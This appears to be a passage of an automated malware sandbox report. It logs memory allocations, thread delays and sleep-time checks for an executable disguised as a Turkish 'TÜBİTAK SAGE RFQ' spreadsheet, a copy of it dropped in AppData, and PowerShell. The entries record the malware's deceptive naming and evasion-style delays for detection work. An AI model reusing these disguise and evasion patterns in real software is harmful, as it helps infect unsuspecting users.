                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeMemory allocated: A30000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeMemory allocated: 2430000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeMemory allocated: 2240000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeMemory allocated: 8790000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeMemory allocated: 9790000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeMemory allocated: 99A0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeMemory allocated: A9A0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeMemory allocated: 1610000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeMemory allocated: 2EA0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeMemory allocated: 4EA0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeThread delayed: delay time: 240000Jump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeThread delayed: delay time: 239875Jump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeThread delayed: delay time: 239765Jump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeThread delayed: delay time: 239629Jump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeThread delayed: delay time: 239500Jump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeThread delayed: delay time: 239390Jump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeThread delayed: delay time: 239281Jump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeThread delayed: delay time: 239172Jump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeThread delayed: delay time: 239052Jump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeThread delayed: delay time: 238906Jump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeThread delayed: delay time: 238781Jump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeThread delayed: delay time: 238668Jump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeThread delayed: delay time: 238562Jump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeThread delayed: delay time: 238453Jump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeThread delayed: delay time: 238343Jump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeThread delayed: delay time: 238226Jump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeThread delayed: delay time: 238107Jump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeThread delayed: delay time: 237922Jump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeThread delayed: delay time: 237781Jump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeThread delayed: delay time: 237667Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeThread delayed: delay time: 599859Jump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeThread delayed: delay time: 599728Jump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeThread delayed: delay time: 599606Jump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeThread delayed: delay time: 599484Jump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeThread delayed: delay time: 599375Jump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeThread delayed: delay time: 599265Jump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeThread delayed: delay time: 599156Jump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeThread delayed: delay time: 599046Jump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeThread delayed: delay time: 598937Jump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeThread delayed: delay time: 598828Jump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeThread delayed: delay time: 598718Jump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeThread delayed: delay time: 598609Jump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeThread delayed: delay time: 598499Jump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeThread delayed: delay time: 598390Jump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeThread delayed: delay time: 598281Jump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeThread delayed: delay time: 598170Jump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeThread delayed: delay time: 598062Jump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeThread delayed: delay time: 597953Jump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeThread delayed: delay time: 597843Jump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeThread delayed: delay time: 597733Jump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeThread delayed: delay time: 597620Jump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeThread delayed: delay time: 597509Jump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeThread delayed: delay time: 597243Jump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeThread delayed: delay time: 597120Jump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeThread delayed: delay time: 596996Jump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeThread delayed: delay time: 596875Jump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeThread delayed: delay time: 596759Jump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeThread delayed: delay time: 596640Jump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeThread delayed: delay time: 596531Jump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeThread delayed: delay time: 596413Jump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeThread delayed: delay time: 596307Jump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeThread delayed: delay time: 596187Jump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeThread delayed: delay time: 596078Jump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeThread delayed: delay time: 595968Jump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeThread delayed: delay time: 595859Jump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeThread delayed: delay time: 595750Jump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeThread delayed: delay time: 595640Jump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeThread delayed: delay time: 595531Jump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeThread delayed: delay time: 595421Jump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeThread delayed: delay time: 595312Jump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeThread delayed: delay time: 595203Jump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeThread delayed: delay time: 595093Jump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeThread delayed: delay time: 594982Jump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeThread delayed: delay time: 594874Jump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeThread delayed: delay time: 594765Jump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeThread delayed: delay time: 594656Jump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeThread delayed: delay time: 594546Jump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeThread delayed: delay time: 594437Jump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeThread delayed: delay time: 594328Jump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeThread delayed: delay time: 594218Jump to behavior
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeThread delayed: delay time: 240000
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeThread delayed: delay time: 239812
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeThread delayed: delay time: 239640
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeThread delayed: delay time: 239528
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeThread delayed: delay time: 239422
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeThread delayed: delay time: 239312
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeThread delayed: delay time: 239202
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeThread delayed: delay time: 239081
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeThread delayed: delay time: 238850
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeThread delayed: delay time: 238436
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeThread delayed: delay time: 238328
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeThread delayed: delay time: 238218
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeThread delayed: delay time: 600000
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeThread delayed: delay time: 599890
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeThread delayed: delay time: 599781
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeThread delayed: delay time: 599671
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeThread delayed: delay time: 599562
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeThread delayed: delay time: 599453
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeThread delayed: delay time: 599343
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeThread delayed: delay time: 599234
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeThread delayed: delay time: 599125
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeThread delayed: delay time: 599015
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeThread delayed: delay time: 598906
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeThread delayed: delay time: 598796
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeThread delayed: delay time: 598687
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeThread delayed: delay time: 598578
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeThread delayed: delay time: 598468
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeThread delayed: delay time: 598359
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeThread delayed: delay time: 598249
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeThread delayed: delay time: 598140
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeThread delayed: delay time: 598031
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeThread delayed: delay time: 597922
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeThread delayed: delay time: 597812
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeThread delayed: delay time: 597703
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeThread delayed: delay time: 597591
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeThread delayed: delay time: 597484
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeThread delayed: delay time: 597374
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeThread delayed: delay time: 597265
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeThread delayed: delay time: 597156
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeThread delayed: delay time: 597047
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeThread delayed: delay time: 596935
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeThread delayed: delay time: 596827
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeThread delayed: delay time: 596718
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeThread delayed: delay time: 596609
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeThread delayed: delay time: 596500
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeThread delayed: delay time: 596390
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeThread delayed: delay time: 596280
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeThread delayed: delay time: 596171
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeThread delayed: delay time: 596062
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeThread delayed: delay time: 595949
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeThread delayed: delay time: 595842
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeThread delayed: delay time: 595734
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeThread delayed: delay time: 595625
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeThread delayed: delay time: 595515
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeThread delayed: delay time: 595406
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeThread delayed: delay time: 595296
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeThread delayed: delay time: 595187
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeThread delayed: delay time: 595078
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeThread delayed: delay time: 594968
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeThread delayed: delay time: 594859
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeThread delayed: delay time: 594750
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeThread delayed: delay time: 594640
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeWindow / User API: threadDelayed 1097Jump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeWindow / User API: threadDelayed 1767Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6071Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7475Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1318Jump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeWindow / User API: threadDelayed 3838Jump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeWindow / User API: threadDelayed 6003Jump to behavior
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeWindow / User API: threadDelayed 546
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeWindow / User API: threadDelayed 1243
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeWindow / User API: threadDelayed 2540
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeWindow / User API: threadDelayed 7321
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe TID: 7864Thread sleep time: -11068046444225724s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe TID: 7864Thread sleep time: -240000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe TID: 7864Thread sleep time: -239875s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe TID: 7864Thread sleep time: -239765s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe TID: 7864Thread sleep time: -239629s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe TID: 7864Thread sleep time: -239500s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe TID: 7864Thread sleep time: -239390s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe TID: 7864Thread sleep time: -239281s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe TID: 7864Thread sleep time: -239172s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe TID: 7864Thread sleep time: -239052s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe TID: 7864Thread sleep time: -238906s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe TID: 7864Thread sleep time: -238781s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe TID: 7864Thread sleep time: -238668s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe TID: 7864Thread sleep time: -238562s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe TID: 7864Thread sleep time: -238453s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe TID: 7864Thread sleep time: -238343s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe TID: 7864Thread sleep time: -238226s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe TID: 7864Thread sleep time: -238107s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe TID: 7864Thread sleep time: -237922s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe TID: 7864Thread sleep time: -237781s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe TID: 7864Thread sleep time: -237667s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7424Thread sleep time: -5534023222112862s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8156Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7576Thread sleep time: -4611686018427385s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7052Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe TID: 4036Thread sleep count: 42 > 30Jump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe TID: 4036Thread sleep time: -38738162554790034s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe TID: 4036Thread sleep time: -600000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe TID: 4480Thread sleep count: 3838 > 30Jump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe TID: 4036Thread sleep time: -599859s >= -30000sJump to behavior
